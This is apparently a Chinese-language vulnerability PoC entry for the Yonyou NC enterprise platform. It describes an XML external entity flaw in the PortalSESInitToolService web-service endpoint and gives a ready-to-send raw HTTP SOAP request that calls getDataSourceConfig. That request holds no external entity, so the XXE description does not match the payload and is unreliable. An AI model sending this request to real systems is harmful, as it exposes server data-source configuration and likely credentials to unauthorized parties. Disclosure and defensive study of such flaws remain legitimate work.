用友 NC /uapws/service/nc.itf.ses.inittool.PortalSESInitToolService XML 外部实体注入漏洞

2026-02-06 用友NC PoC Public

Description

用友 NC 大型企业数字化平台,深度应用新一代数字智能技术,打造开放、互联、融合、智能的一体化平台,聚焦数智化管理、数智化经营、数智化商业等三大企业数智化转型战略方向,提供涵盖数字营销、财务共享、全球司库、智能制造、敏捷供应链、人才管理、智慧协同等18大解决方案,帮助大型企业全面落地数智化。用友 NC 存在 XML 外部实体注入漏洞,该漏洞存在于 /uapws/service/nc.itf.ses.inittool.PortalSESInitToolService 接口中,攻击者可以通过上传恶意文件(如包含XXE攻击的XML文件)来利用该漏洞,可能导致服务器敏感信息泄露或进一步的安全风险。

PoC

POST /uapws/service/nc.itf.ses.inittool.PortalSESInitToolService HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
Content-Length: 244
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cache-Control: max-age=0

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:por="http://inittool.ses.itf.nc/PortalSESInitToolService">
 <soapenv:Header/>
 <soapenv:Body>
    <por:getDataSourceConfig/>
 </soapenv:Body>
</soapenv:Envelope>

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities